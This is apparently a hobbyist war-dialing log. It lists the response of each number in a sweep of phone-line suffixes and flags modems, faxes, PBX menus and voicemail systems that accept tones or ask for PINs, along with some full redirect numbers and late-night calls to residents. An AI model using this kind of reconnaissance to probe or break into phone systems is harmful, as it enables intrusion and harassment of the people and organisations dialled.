0272 - ahu
0273 - ahu
0274 - picked up, hung up
0275 - ahu
0276 - ring, ring, ring, ring, ring, no answer
0277 - ring, ring, ring, ring, ring, no answer
0278 - ring, ring, ring, ring, ring, no answer
0279 - ring, ring, ring, ring, ring, no answer
0280 - ring, ring, ring, ring, ring, no answer
0281 - ring, ring, ring, ring, ring, no answer
0282 - ring, ring, ring, ring, voice, sounded very tired, then started
shouting at me. Not supprised, its nearly mignight ;O
0283 - ahu
0284 - ring, ring, ring, ring, ring, no answer
0285 - ring, ring, ring, ring, ring, no answer
0286 - ring, ring, ring, ring, voice, also sounded very tired and pissed off
then a bloke started going on at me and breathing down the phone :/
0287 - temp out of service
0288 - ahu
0289 - ahu
0290 - bt, the number called has been changed to, a mobile number
0291 - ring, ring, ring, ring, ring, no answer
0292 - ahu
0293 - ring, ring, ring, ring, ring, no answer
0294 - ahu
0295 - ahu
0296 - ahu
0297 - ring, ring, ring, ring, ring no answer
0298 - ring, ring, ring, ring, answer phone, responded to dtmf tones
0299 - ring, ring, ring, voice hello hello, ITS MIDNIGHT
0300 - ahu
0301 - ahu
0302 - ahu
0303 - ring, ring, ring, ring, ring, ring, no answer
0304 - ring, ring, ring, answerphone dtmfs did nothing
0305 - ahu
0306 - ring, ring, ring, ring, ring, no answer
0307 - ring, ring, ring, voice hello j w
0308 - ahu
0309 - ahu
0310 - ring, voice hello, hello, hello tut
0311 - ahu
0312 - ahu
0313 - ahu
0314 - slow to connect, ring, ring, ring, answer, modem/fax probably fax
0315 - ring, ring, ring, ring, ring, answerphone bleeped in respoince to
dtmf tones.
0316 - ahu
0317 - ring, ring, ring, ring, ring, voice
0318 - ahu
0319 - ahu
0320 - ring, ring, ring, ring, ring, no answer
0321 - ahu
0322 - ahu
0323 - ring, ring, ring, ring, ring, no answer
0324 - ahu
0325 - ring, ring, ring, ring, no answer
0326 - ring, ring, ring, ring, ring, no answer
0327 - ahu
0328 - ring, ring, ring, ring, ring, no answer
0329 - ring, ring, ring, ring, ring, voice
0330 - ahu
0331 - ring, ring, ring, ring, ring, ring
0332 - ahu
0333 - ahu
0334 - ahu
0335 - ahu
0336 - ahu
0337 - ahu
0338 - ring, ring, ring, ring, ring, ring, no answer
0339 - slow to connect, ring, ring, ring, voice
0340 - ahu
0341 - ahu
0342 - ring, ring, ring, ring, ring, ring, no answer
0343 - ahu
0344 - temp out of service
0345 - ahu
0346 - ahu
0347 - ahu
0348 - ahu
0349 - ahu
0350 - ahu
0351 - ahu
0352 - ring, ring, ring, ring, ring, ring, you call cannot be taken at the
moment, answerphone
0353 - ahu
0354 - ahu
0355 - ring, ring, ring, ring, voice
0356 - ahu
0357 - WIERD, examine this one closer
0358 - ahu
0359 - ring, ring, ring, ring, ring, no answer
0360 - ring, ring, ring, ring, ring, no answer
0361 - ahu
0362 - ahu
0363 - ring, ring, ring, ring, answerphone, doesnt respond to dtmfs
0364 - ring, ring, ring, ring, ring, no answer
0365 - ahu
0366 - ahu
0367 - ahu
0368 - ahu
0369 - ahu
0370 - ring, ring, ring, ring, ring, no answer
0371 - ahu
0372 - ring, ring, ring, ring, ring, no answer
0373 - ring, ring, ring, ring, ring, no answer
0374 - ahu
0375 - ahu
0376 - ahu
0377 - ahu
0378 - ahu
0379 - ring, ring, ring, voice
0380 - answers immediatly, modem
0381 - ahu
0382 - ring, answer phone, responds to dtmf tones
0383 - ahu
0384 - ahu
0385 - ahu
0386 - ahu
0386 - ring, answerphone, # drops you into a prompt asking for extension num
0387 - ring, as above * asks you for an "id"
0388 - ahu
0389 - ahu
0390 - ahu
0391 - ahu
0392 - ahu
0393 - ahu
0394 - ring, ring, ring, ring, ring, no answer
0395 - ahu
0396 - ahu
0397 - ring, ring, ring, ring, ring, no answer
0398 - ahu
0399 - ring, ring, ring, ring, ring, answerphone, responds to dtmfs
0400 - ring, ring, answerphone, dtmf tones do nothing
0401 - ring, ring, ring, ring, ring, hello, your call cannot be taken at the
moment, so please leave your message at the tone responds to dtmfs
0402 - ahu
0403 - ring, norwich union direct, pbx
0404 - ahu
0405 - ahu
0406 - ring, ring, ring, ring, ring, ring, no answer
0407 - ahu
0408 - ahu
0409 - ring, norwich union direce, same as 0403
0410 - ring, same as above
0411 - ring, ring, ring, ring, ring, no answer
0412 - ring, ring, ring, ring, ring, no answer
0413 - ring, ring, ring, ring, ring, no answer
0414 - ring, ring, ring, ring, ring, no answer
0415 - ahu
0416 - ring, ring, ring, ring, ring, no answer
0417 - ring, ring, ring, ring, ring, no answer
0418 - ring, ring, ring, ring, ring, no answer
0419 - ring, ring, ring, ring, ring, no answer
0420 - ring, ring, ring, ring, ring, no answer
0421 - ring, ring, ring, ring, ring, no answer
0422 - ring, ring, ring, ring, ring, no answer
0423 - ring, ring, ring, ring, ring, no answer
0424 - ring, ring, ring, ring, ring, no answer
0425 - ring, ring, ring, ring, ring, no anseer
0426 - ring, ring, ring, ring, ring, no answer
0427 - ring, ring, ring, ring, ring, no answer
0428 - ring, ring, ring, ring, ring, no answer
0429 - ring, ring, ring, ring, ring, no answer
0430 - ring, ring, ring, ring, ring, no answer
0431 - ring, ring, ring, ring, ring, no answer
0432 - ring, ring, ring, ring, ring, no answer
0433 - ring, ring, ring, ring, welcome to psinet, sorry we are closed, hit
*, to transfer out of firmmail, press 0 to reach an operator press #,
to transfer to another extension, dial that extension, and the press
hash.
0434 - ring, ring, modem/fax probably fax
0435 - ring, ring, ring, ring, welcome to psinet, as above
0436 - ring, ring, ring, ring, welcome to psinet as above
0437 - ahu
0438 - ahu
0439 - ahu
0440 - ahu
0441 - ring, thank you for calling norwich union direct, hit * and it ask
for another extension number, # and it wants a mailbox number
0442 - ring, same as above
0443 - as above
0444 - as above
0445 - ring, as above
0446 - ring, as above
0447 - ring, thank you for calling something financial services, hung up,
dtmf did nothing
0448 - i'm sorry the system is buy please try again later, thank you for
calling renasance editions, we are closed if you want a brochure,
dial 1 to place an order dial 2.
0449 - ring, ring, ring, ring, ring, no answer
0450 - ring, ring, ring, ring, answer phone, dosn't respond to dtmfs
0451 - ring, ring, answerphone, BAD qulity, dtmfs do nothing
0452 - answered immediatly, modem
0453 - ring, ring, ring, ring, ring, no answer
0454 - bt, the number called has been changed to 01473890088
0455 - ring, ring, ring, ring, ring, no answer
0456 - bt, the number called has been changed to 01708385969
0457 - ring, ring, ring, ring, ring, no answer
0458 - ring, ring, ring, ring, ring, no answer
0459 - ring, ring, ring, ring, ring, no answer
0460 - slow to connect, ring, thank you for calling dallas carpets, reads
out some info, doesn't respond to dtmfs
0461 - ahu
0462 - ring, ring, ring, ring, ring, no answer
0463 - ahu
0464 - ring, ring, ring, ring, ring, no answer
0465 - ring, ring, ring, ring, ring, no answer
0466 - ring, ring, unfortunatly all our phone lines are in use, redirecting
you to our answer, *# do stuff
0467 - ring, ring, answerphone no dtmf
0468 - ahu
0469 - ring, ring, ring, ring, ring, no answer
0470 - ring, ring, ring, ring, ring, no anser
0471 - ring, ring, ring, that you for calling somethin products dtmf does
nothing
0472 - ring, ring, ring, ring, ring, no answer
0473 - ring, ring, ring, ring, ring, no answer
0474 - ring, ring, answerphone, doesn't respond to dtmf
0475 - ahu
0476 - ahu
0477 - ring, voice
0478 - some voice, asking for a messsage
0479 - ring, ring, ring, answerphone, dtmfs do nothing, plays fur elise
while rewinding the tape ;)
0480 - ring, ring, ring, ring, voice
0481 - ring, ring, ring, ring, wait, answerphone, dtmfs do something
0482 - ahu
0483 - ahu
0484 - ahu
0485 - ring, ring, ring, ring, ring, no answer
0486 - ring, ring, ring, ring, ring, no answer
0487 - ahu
0488 - ring, ring, ring, modem/fax, probably fax
0489 - ahu
0490 - ahu
0491 - ahu
0492 - ahu
0493 - ahu
0494 - ahu
0495 - ring, voice
0496 - ring, ring, ring, ring, answerphone, scottish ;P dtmfs do nothing
0497 - ahu
0498 - ring, ring, ring, voice
0499 - ring, ring, ring, ring, voice
0500 - ahu
0501 - ring, ring, ring, voice
0502 - ahu
0503 - bt
0504 - ring, ring, ring, ring, answerphone
0505 - ring, ring, ring, voice
0506 - voice
0507 - ring, ring, ring, ring, no answer
0508 - ring, ring, ring, ring, no answer
0509 - ring, ring, ring, ring, no answer
0510 - ring, ring, voice
0511 - ring, ring, ring, ring, no answer
0512 - ahu
0513 - ahu
0514 - ring, voice
0515 - ahu
0516 - ring, ring, ring, ring, answerphone
0517 - ring, ring, ring, ring, no answer
0518 - ring, ring, ring, ring, no answer
0519 - bt
0520 - ring, ring, ring, ring, no answer
0521 - ring, ring, ring, ring, no answer
0522 - ring, ring, ring, ring, no answer
0523 - ahu
0524 - ring, ring, voice
0525 - ahu
0526 - ring, ring, ring, ring, no answer
0527 - ring, bleep, thank you for calling the business extension, responds
to dtmf
0528 - ahu
0529 - ring, ring, ring, ring, no answer
0530 - ring, ring, ring, ring, voice asked is mr. shady was there? said no
0531 - ring, ring, ring, voice, Heh
0532 - ring, ring, long pause, VERY long pause, is it doing anyinthg?
0533 - ring, ring, ring, answerphone
0534 - ring, ring, ring, voice, hehe, i'd just like to advise you that this
calls currently being traced.
0535 - ring, ring, ring, ring, no answer
0536 - ring, ring, ring, voice, once again, i'll have to remind you this
call is being traced HAHA
0537 - ring, ring, no answer
0538 - bleeeeeeeeeeeeeeeeep
0539 - answerphone, dtmfs did something
0540 - ring, ring, voice
0541 - ring, ring, bleep another bleep odd
0542 - ring, ring, no answer
0543 - ring, ring, no answer
0544 - ring, ring, voice
0545 - bleep, modemsounding tone, then stopped and hung up, c5?
0546 - ring, ring, ring, no answer
0547 - ring, ring, ring, no answer
0548 - ages to connect, ring, ring, ring, no answer
0549 - ring, ring, picked up then did nothing, then hung up
0550 - ring, ring, voice
0551 - ring, ring, ring, answerphone didn't respond to dtmfs
0552 - answered immediatly fooking loud bleep, then, please enter your
card number, sorry, you have made an invalid selection, vt1?
0553 - ring, ring, voice
0554 - ring, ring, ring, no answer
0555 - bt
0556 - ring, voice, good morning, ringback? weird
0557 - ring, ring, ring, no answer
0558 - ahu
0559 - ring, ring, ring, voice
0560 - ahu
0561 - ring, ring, ring, ring, ring, no answer
0562 - ring, good morning kellingly?
0563 - ages to conenct, ring, ring, ring, ring, voice
0564 - ring, ring, ring, ring, voice
0565 - ring, ring, ring, ring, no answewr
0566 - ring, ring, good morning nspcc help line
0567 - ahu
0568 - ahu
0569 - ring, answer,tone on pickup, voice
0570 - ring, ring, ring, ring, no answer
0571 - ahu
0572 - ring, ring, ring, ring, no answer
0573 - ring, ring, ring, ring, pick up, answerphone no dtmfs
0574 - ring, ring, ring, ring, no answer
0575 - ahu
0576 - ahu
0577 - ahu
0578 - ahu
0579 - bleep, hang up
0580 - ring, good morning and welcome to heartlines, heh, put an advert in
heh, even better give the address or someone you dont like
0581 - modem: atdt 14108000560581 CONNECT 57600 ÿ
0582 - ring, ring, ring, ring, no answer
0583 - ring, modem: atdt 14108000560581 CONNECT 57600 ÿÿ
0584 - ahu
0585 - ring, ring, odd noise on pickup, wierd, modem/fax FAX
0586 - ahu
0587 - ahu
0588 - ahu
0589 - ahu
0590 - ring, ring, bleep, good morning and welcome to close encounters, same
as 0580
0591 - bleep
0592 - ring, ring, ring, ring, ring, no answer
0593 - ahu
0594 - ahu
0595 - bleep, slience no ringing? odd
0596 - ring, ring, ring, ring, no answer
0597 - ahu
0598 - pick up, hang up
0599 - ring, hello, you are through to, prestige, all calls are recorded
0600 - ring, ring, ring, ring, voice
0601 - ring, ring, voice
0602 - ring, ring, ring, ring, voice
0603 - ring, ring, ring, ring, hello, social services, can i help you?
0604 - ring, ring, ring, answerphone, doesn't respond to dtmfs
0605 - ring, ring, ring, ring, no answer
0606 - ring, ring, ring, ring, voice
0607 - ring, ring, ring, voice
0608 - ring, ring, ring, voice
0609 - ring, ring, ring, ring, no answer
0610 - ring, ring, voice
0611 - ring, ring, odd answerphone, responds to dtmfs
0612 - ring, good mornning something motors
0613 - ring, ring, ring, ring, voice
0614 - ahu
0615 - ahu
0616 - ring, ring, voice
0617 - ahu
0618 - ring, ring, voice
0619 - ring, ring, voice
0620 - ring, ring, ring, ring, ring, no answer
0621 - ring, ring, ring, voice
0622 - ring, ring, voice
0623 - ring, ring, ring, tone on pickup, voice
0624 - bleep
0625 - ring, ring, ring, voice
0626 - ahu
0627 - ahu
0628 - ring, ring, voice
0629 - ahu
0630 - ring, ring, voice
0631 - ahu
0632 - ring, ring, ring, ring, no answer
0633 - ahu
0634 - ring, ring, ring, ring, no answer
0635 - ring, ring, ring, voice
0636 - slow to conenct, ring, ring, voice
0637 - ring, ring, ring, welcome to elise introductions, doesn't respond
to dtmf
0638 - ring, ring, ring, voice
0639 - slow to connect, ring, voice
0640 - ring, ring, ring, ring, no answer
0641 - ring, ring, ring, ring, voice
0642 - ring, ring, ring, ring, voice, global coffee... ORDER SOME!!
0643 - ring, ring, voice
0644 - ring, voice
0645 - ahu
0646 - ring, ring, voice
0647 - ring, ring, ring, ring, no answer
0648 - ahu
0649 - ring, ring, ring, ring, no answer
0650 - ahu
0651 - ahu
0652 - ring, ring, ring, ring, no answer
0653 - ring, voice, nichols removals
0654 - ring, ring, ring, ring, no answer
0655 - ring, voice
0656 - bt
0657 - ring, ring, ring, ring, voice
0658 - ring, ring, voice
0659 - ring, ring, ring, ring, no answer
0660 - ring, ring, ring, ring, no answer
0661 - ahu
0662 - ahu
0663 - ring, ring, ring, ring, voice
0664 - ring, ring, ring, ring, voice
0665 - ahu
0666 - ring, ring, voice satan
0667 - ring, ring, ring, ring, no answer
0668 - ring, ring, ring, ring, answerphone
0669 - ring, voice
0670 - ahu
0671 - ahu
0672 - ahu
0673 - ring, ring, ring, ring, voice, hello, green tent?
0674 - ahu
0675 - ring, voice
0676 - ring, voice
0677 - ahu
0678 - ahu
0679 - ring, ring, ring, ring, no answer
0680 - temp out of service
0681 - ring, ring, voice, then answerphone cut in
0682 - ring, ring, ring, no answer
0683 - ring, ring, ring, no answer
0684 - ring, ring, ring, no answer
0685 - ahu
0686 - ring, ring, ring, ring, no answer
0687 - ring, ring, ring, ring, no answer
0688 - ring, ring, ring, ring, no answer
0689 - ring, ring, ring, ring, voice
0690 - ring, ring, voice same as above
0691 - ahu
0692 - ring, ring, ring, voice
0693 - ahu
0694 - ahu
0695 - bleep
0696 - ahu
0697 - ring, ring, ring, ring, voice
0698 - ring, ring, ring, ring, voice
0699 - ring, ring, voice
0700 - ring, answer, pause, please waqit while we conenct your call,
0701 - answers immediatly, odd tone
0702 - ahu
0703 - ring, ring, voice
0704 - ring, ring, ring, ring, no answer
0705 - ring, ring, voice
0706 - ahu
0707 - ring, ring, voice
0708 - ring, ring, ring, ring, voice
0709 - ring, ring, ring
0710 - ring, ring voice
0711 - ring, ring, ring, ring, no answer
0712 - ring, ring, ring, ring, no answer
0713 - ring, ring, ring, ring, no answer
0714 - ahu
0715 - ahu
0716 - bleep
0717 - ring, ring, answerphone doesn't respond to dtmf
0718 - ring, ring, ring, ring, no answer
0719 - ahu
0720 - ring, ring, voice
0721 - ring, ring, ring, ring, no answer
0722 - ahu
0723 - ahu
0724 - ahu
0725 - ahu
0726 - ahu
0727 - ring, ring, ring, voice
0728 - ring, ring, voice
0729 - ring, ring, ring, voice
0730 - ring, ring, ring, answerphone, doesn't respond to dtmf
0731 - ring, voice
0732 - ring, ring, answerphone no dtmfs
0733 - ring, ring, voice
0734 - ring, ring, ring, voice
0735 - ring, ring, ring, answerphone responded to dtmf
0736 - ring, ring, ring, voice
0737 - ring, ring, ring, ring, put me on hold, voice
0738 - ahu
0739 - ring, ring, voice
0740 - ring, ring, ring, ring, ring, voice
0741 - ahu
0742 - ring, welcome to the profrssional promotion company, asks
for extension number, PBX?
0743 - ring, ring, ring voice
0744 - ahu
0745 - ahu
0746 - ahu
0747 - ring, ring, ring, voice
0748 - ahu
0749 - ring, ring, ring, ring, voice
0750 - ahu
0751 - ahu
0752 - ahu
0753 - ahu
0754 - ahu
0755 - ring, ring, voice
0756 - ring, ring, ring, answerphone, doesn't respond to dtmfs
0757 - ahu
0758 - ahu
0759 - ahu
0760 - ahu
0761 - ahu
0762 - ahu
0763 - slow to ring, ring, ring, ring, ring, voice, sounded like a mobile
0764 - ring, ring, ring, ring, no answer
0765 - ring, ring, ring, ring, voice
0766 - ring, ring, ring, ring, voice
0767 - ring, ring, voice
0768 - ring, ring, ring, ring, ring, no answer
0769 - ahu
0770 - bleep
0771 - voice
0772 - voice, same as above
0773 - rang for ages, no answer
0774 - answerphone, responds to dtmfs
0775 - voice
0776 - no answer
0777 - slow to connect, rang for a while, no answer
0778 - no answer
0779 - ahu
0780 - 3 rings, no answer
0781 - bleep
0782 - bleep
0783 - 2 rings, voice
0784 - 2 rings, same voice as above
0785 - 2 rings, same voice as above
0786 - same as above
0787 - ahu
0788 - very slow to connect, 2 rings, voice
0789 - no answer
0790 - bt
0791 - voice
0792 - same as above
0793 - ahu
0794 - 4 rings, then voice
0795 - ahu
0796 - bleep
0797 - lloyds tsb, voice
0798 - 2 rings, answer, odd tones voice
0799 - 2 rings, securicom information systems, voice
0800 - ahu
0801 - welcome to swindon credit line
0802 - voice
0803 - 4 rings voice
0804 - voice
0805 - 1 ring, then answer, teleconfrencing service
0806 - ahu
0807 - very strange ring tone, rang 7 times, no answer
0808 - no answer
0809 - ahu
0810 - rang 2 times, voice
0811 - rang 4 times, voice
0812 - ahu
0813 - bt, tnchbc 01278439494
0814 - ahu
0815 - ahu
0816 - ahu
0817 - no answer
0818 - rang 3, times, voice
0819 - ahu
0820 - no answer
0821 - no answer
0822 - rang 6 times, a dry cleaners?!?!? i could actually hear machines
in the background
0823 - ahu
0824 - rang 4 times, voice
0825 - rang 1 time, same voice as above
0826 - no answer
0827 - rang 1 time, answer, then silence, i could hear stuff in the
background, but whoever answered wasn't saying anything.
0828 - rang 2 times, good afternoon courier service, dtmf tone on pickup v
0829 - rang 2 times voice
0830 - rang 4 times, voice, blooke saying, "do you wanna write the number
down" ooh gonna call the pigs are ya?
0831 - rang 1, voice
0832 - rang 1 voice
0833 - ahu
0834 - ahu
0835 - ahu
0836 - ahu
0837 - rang 5 times, something catering
0838 - rang 3 times, voice
0839 - rang 2 times, voice
0840 - rang 1, dtmf on pickup, answerphone, * drops you into a "please enter
the extension you require"
0841 - ring1, modem/fax sounds like fax, FAX
0842 - rang 4, no answer
0843 - ring4, voice
0844 - ring3, voice cornhill security
0845 - bleep
0846 - slow to conenct, ring 1, answerphone, * "please
0847 - ahu
0848 - ahu
0849 - ahu
0850 - ahu
0851 - slow to connect, no answer
0852 - no answer
0853 - ahu
0854 - bleeeeeeep, continuously
0855 - no answer
0856 - no answer
0857 - one ring, partner services, if this is an error, please dial
0500003038, answerphone
0868 - tarmac recruitment line, VMB?
0869 - no answer
0870 - ahu
0871 - ahu
0872 - no answer
0873 - answerphone, norwich union direct, responds to dtmf
0874 - ahu
0875 - 1 ring, modem
0876 - ring, ring, answerphone, dtmfs did nothing
0877 - ahu
0878 - ring, ring, ring, voice
0879 - no answer
0880 - rang 1s, answerphone, * enteres you into a prompt, teleadapt?
0881 - rang 2 times, answerphone, dtmf did something
0882 - ring, ring, answerphone, same as above
0883 - rang 2, same as above
0884 - same as above
0885 - same as above
0886 - same as above
0887 - no answer
0888 - bleep
0889 - norwich union direct, answerphone, dtmf tones do something
0890 - same as above
0891 - same as above
0892 - same as above
0893 - same as above
0894 - same as above
0895 - same as above
0896 - tone on pickup, answerphone
0897 - cable and wireless voicemail, same system as above
0898 - one ring, modem
0899 - answered immediatly, answerphone, no dtmfs
0900 - rang 3, voice
0901 - answered immediatly, modem
0902 - answered immediatly, modem
0903 - ring, norwich union answerphone, # asks you for mailbox number
0904 - hum, put me on hold, cable and wireless voice
0905 - rang 2, voice
0906 - ring, ring, ring, voice
0907 - odd tones, my mobile didn't recgognise at as having answered
0908 - ring, ring, ring, ring, no answer
0909 - ring, answer, voice
0910 - your call is being diverted, please wait, ring, ring, voice
0911 - ring, ring, ring, no answer
0912 - ring, ring, ring, no answer
0913 - slow to conect, no answer
0914 - ahu
0915 - ring, ring, voice
0916 - ahu
0917 - ahu
0918 - ahu
0919 - no answer
0920 - cable and wireless business faults, voice
0921 - no answer
0922 - slow to connect, cable and wireless, voice
0923 - no answer
0924 - temp out of service
0925 - no answer
0926 - answerphone
0927 - temp out of service
0928 - ahu
0929 - ahu
0930 - ahu
0931 - ahu
0932 - no answer
0933 - ahu
0934 - bleep
0935 - ahu
0936 - ahu
0937 - voice
0938 - voice
0939 - ring, tone, odd tones
0940 - ring, please enter the 4 digit extension number
0941 - ahu
0942 - no answer
0943 - norwich union answerphone, # asks you for mailbox number
0944 - bt
0945 - ahu
0946 - answerphone, didn't respond to dtmf
0947 - bt, thchbc 01303894152
0948 - ring, answerphone, press # and it hangs up
0949 - ring, ring, answerphone, doesn't respond to dtmf
0950 - no answer
0951 - ahu
0952 - voice
0953 - ring, modem
0954 - ahu
0955 - answerphone
0956 - no answer
0957 - ahu
0958 - ring, voice
0959 - voice, odd, payphone, bee-boop in the background
0960 - ahu
0961 - no answer
0962 - ahu
0963 - no answer
0964 - ring, answerphone, # * make it hang up
0965 - ring, ring, ring, dtmf tone on pickup, modem
0966 - ahu
0967 - no answer
0968 - ahu
0969 - bt
0970 - no answer
0971 - no answer
0972 - no answer
0973 - no answer
0974 - answerphone, norwich union, #: please enter your mailbox number
0975 - no answer
0976 - no answer
0977 - no answer
0978 - temp out of service
0979 - dtmf on pickup, then nothing
0980 - ring, ring, answerphone
0981 - no answer
0982 - answered, odd tones, then voice
0983 - bleep
0984 - no asnwer
0985 - slow to conenct, no answer
0986 - ahu
0987 - no answer
0988 - answerphone, reponded to dtmfs with bleeps
0989 - no answer
0990 - ring, answer, answerphone # = nothing to confirm, record at the tone.
0991 - no answer
0992 - voice
0993 - voice
0994 - no answer
0995 - your session cannot be continued at this time, wierd
0996 - no answer
0997 - no answer
0998 - ring, cable and wireless, # made it ring ;P put me on hold
0999 - ring, silverstone insurance claims line, some automated shit
1000 - rang 1, modem/fax Fax
1001 - answered, THEN STARTED RINGING? answerphone, responds to dtmfs, asks
for passcode
1002 - voice
1003 - 2 rings, modem/fax FAX
1004 - no answer
1005 - answerphone, * please enter your passcode, funny tones
1006 - ring, ring, modem/fax FAX
1007 - no answer
1008 - odd bleeps
1009 - voice
1010 - ahu
1011 - voice
1012 - ring, ring, "all callers must be 18 or over" porno line free for
women?!?!?
1013 - ring, ring, answerphone *: please wait bleeps in response
1014 - voice
1015 - voice
1016 - voice
1017 - ahu
1018 - ring, ring, modem/fax modem
1019 - ahu
1020 - ahu
1021 - bleep
1022 - voice
1023 - no answer
1024 - no answer
1025 - ahu
1026 - no answer
1027 - no answer
1028 - no answer
1029 - no answer
1030 - no answer
1031 - loud bleep
1032 - no answer
1033 - voice
1034 - no answer
1035 - 2 rings, modem
1036 - same as 1031
1037 - ahu
1038 - ahu
1039 - no answer
1040 - no answer
1041 - ages to connect, voice, pest control, order them round to control
pesky lamers
1042 - ahu
1043 - ages to connect, same as 1041
1044 - no answer
1045 - ages to connect, no answer
1046 - answered immediatly, modem
1047 - voice, sounded like a home phone, tv in the background
1048 - no answer
1049 - voice, same as 1047, only this time he didn't say anything
1050 - loud bleep
1051 - no answer
1052 - 2 rings, answerphone, press * and you get a fax
1053 - slow to connect, no answer
1054 - slow to connect, bleep voice
1055 - loud bleep
1056 - ahu
1057 - ahu
1058 - 1 ring, voice
1059 - no answer
1060 - ahu
1061 - ahu
1062 - ahu
1063 - bt, tnchbc 01276471802
1064 - no answer
1065 - no answer
1066 - ahu
1067 - no answer
1068 - bleep
1069 - voice
1070 - ahu
1071 - no answer
1072 - ring, bleep, answerphone, responded to dtmfs
1073 - 3 rings, modem
1074 - same as 1072
1075 - same as above
1076 - bleep
1078 - 3 rings, modem/fax FAX
1079 - no answer
1080 - very slow to connect, no answer
1081 - bleep
1082 - no answer
1083 - ahu
1084 - no answer
1085 - 3 rings, modem
1086 - answerphone
1087 - no answer
1088 - answerphone
1089 - no answer
1090 - slow to connnect, pick up, hang up
1091 - no answer
1092 - no answer
1093 - voice
1094 - answerphone, * causes it to hang up
1095 - one ring, tone on pickup answerphone
1096 - voice
1097 - odd ring, no answer
1098 - answerphone, * = please enter your sec code, 2 digits, 2 trys
1099 - voice
1100 - odd ring, no answer
1101 - ahu
1102 - ahu
1103 - ahu
1104 - no answer
1105 - ahu
1106 - no answer
1107 - 2 rings, modem
1108 - bleep
1109 - no answer
1110 - no answer
1111 - ahu
1112 - ahu
1113 - temp out of service
1114 - 4 rings, answered, then continued to ring
1115 - no answer
1116 - ahu
1117 - odd ring, no answer
1118 - no answer
1119 - bleep
1120 - ahu
1121 - bleep
1122 - no answer
1123 - voice
1124 - no answer
1125 - no answer
1126 - ahu
1127 - bleep
1128 - voice
1129 - voice
1130 - ahu
1131 - no answer
1132 - no answer
1133 - ahu
1134 - no answer
1135 - ahu
1136 - no answer
1137 - ahu
1138 - answer, bleep, answerphone
1139 - answerphone, or fax
1140 - ring, voice
1141 - 1 ring, voicemail, VMB extension number
1142 - 2 rings, answered, and bleeped
1143 - no answer
1144 - bt, tnchbc 01283704448
1145 - ahu
1146 - asks for an id number, followed by the * key
1147 - ahu
1148 - answerphone, icon teleco, responded to dtmf
1149 - ahu
1150 - voice
1151 - 2 rings, hum.. some companys infoline, gives share values etc.
1152 - no answee
1153 - no answer
1154 - bleep
1155 - no answer
1156 - ahu
1157 - ages to connect, answered immediatly, played a tone repeatdly,
responded to dtmfs, then started playing fax bleeps at me??!?!? very
odd!!!!.
1158 - no answer
1159 - no annswer
1160 - ahu
1161 - voice
1162 - ahu
1163 - no answer
1164 - no answer
1165 - ahu
1166 - 2 rings, modem
1167 - no answer
1168 - voice
1169 - voice
1170 - ahu
1171 - calls to this number are being diverted, please hold, temp
unavailable
1172 - same as above
1173 - same as above
1174 - same as above
1175 - as bove
1176 - voice
1177 - ahu
1178 - ahu
1179 - voice
1180 - voice
1181 - no answer
1182 - answerphone, responded to dtmfs
1183 - ahu
1184 - oddd ring, no answer
1185 - ahu
1186 - amswerphone, responded to dtmfs
1187 - bt, change to 07989408255
1188 - ahu
1189 - 1 ring, dtmf on pickup, please hold as we connect you
1190 - no answer
1191 - 2 rings, modem
1192 - ahu
1193 - no answer
1194 - answerphone #, please enter sec code, 4digit
1195 - no answer
1196 - lloyds tsb, answerphone, didn'nt respond to dtmfs
1197 - no answer
1198 - vpoce
1199 - ahu
1200 - 2 rings, answerphone
1201 - ahu
1202 - 1 ring, modem
1203 - no answer
1204 - no answer
1205 - ahu
1206 - ahu
1207 - no answer
1208 - no answer
1209 - ahu
1210 - ahu
1211 - no answer
1212 - odd ring, answewrphone, *, please enter your four digit pin
1213 - 3 rings, modem
1214 - no answer
1215 - no answer
1216 - answerphone nno dtmf
1217 - 1 ring, tone, * please press the # key, id?
1218 - no answer
1219 - no answer
1220 - loud noise DOWN THE PHONE, scared the crap outa me
1221 - voice
1222 - 1 ring, modem/fax FAX
1223 - no answer
1224 - no answer
1225 - 2 ring, modem
1226 - no answer
1227 - ahy
1228 - ahu
1229 - 3 rings, modem/fax FAX
1230 - ahu
1231 - no answer
1232 - ahu
1233 - no answer
1234 - answerphone, * please dial the number of the person you are calling
3 digit boxen, tells you valix boxen
1235 - voice
1236 - ahu
1237 - voice
1238 - ahu
1239 - 3 rings, modem/fax FAX
1240 - ahu
1241 - no answer
1242 - no answer
1243 - no answer
1244 - no answer
1245 - voice, jupiter teleco
1246 - ahu
1247 - very slow to connect, c5? cleep on pickup, voice, bad line
1248 - ahu
1249 - voice
1250 - ahu
1251 - voice, payphone, bee-bop in the background
1252 - ahu
1253 - ahu
1254 - ahu
1255 - no answer
1256 - answerphone. 2 digit pin
1257 - voice, same as 1247
1258 - 2 rings, answerphone, didnt respond to dtmfs
1259 - no answer
1260 - ahu
1261 - answerphone, a bit camp innit, 0 made it ring
1262 - ahu
1263 - no answer
1264 - no answer
1265 - no answer
1266 - no answer
1267 - no answer
1268 - voice
1269 - ahu
1270 - no answer
1271 - no answer
1272 - ahu
1273 - no answer
1274 - ahu
1275 - no answer
1276 - bt
1277 - no answer
1278 - no answer
1279 - odd ring, answerphone, some bloke picked up as i was hacking it
1280 - ahu
1281 - no answer
1282 - no answer
1283 - voice
1284 - no answer
1285 - no answer
1286 - ahu
1287 - no answer
1288 - ahu
1289 - voice
1290 - ahu
1291 - no answer
1292 - no answer
1293 - no answer
1294 - 2 rings, modem/fax FAX
1295 - ahu
1296 - ahu
1297 - no answer
1298 - ahu
1299 - no answer
1300 - no answer
1301 - no answer
1302 - 4 rings, wait, modem/fax modem
1303 - voice
1304 - ahu
1305 - no answer
1306 - no answer
1307 - 2 rings, answerphone, responded to dtmfs
1308 - voice
1309 - voice
1310 - ahu
1311 - voice
1312 - ahu
1313 - no answer
1314 - temp out of service
1315 - ahu
1316 - answerphone, * to send a fax
1317 - no answer
1318 - 3 rings, answerphone, didn't respond to dtmfs
1319 - ahu
1320 - no answer
1321 - answerphone, responded to dtmfs
1322 - no answer
1323 - ahu
1324 - ahu
1325 - ahu
1326 - no answer
1327 - voice
1328 - ahu
1329 - no answer
1330 - ahu
1331 - no answer
1332 - no answer
1333 - no answer
1334 - ahu
1335 - 3 rings, answered then played tones, seemed to respond to dtmfs FAX??
1336 - ahu
1337 - ahu
1338 - ahu
1339 - voice
1340 - ahu
1341 - answered, then started ringing, answerphone, didn't respond to dtmfs
1342 - 3 rings, answerphone, didn't respond to dtmf
1343 - mp amswer
1344 - voice
1345 - 3 rings, answerphone
1346 - 3 rings, answerphone
1347 - no answer
1348 - ahu
1349 - no answer
1350 - no answer
1351 - no answer
1352 - voice
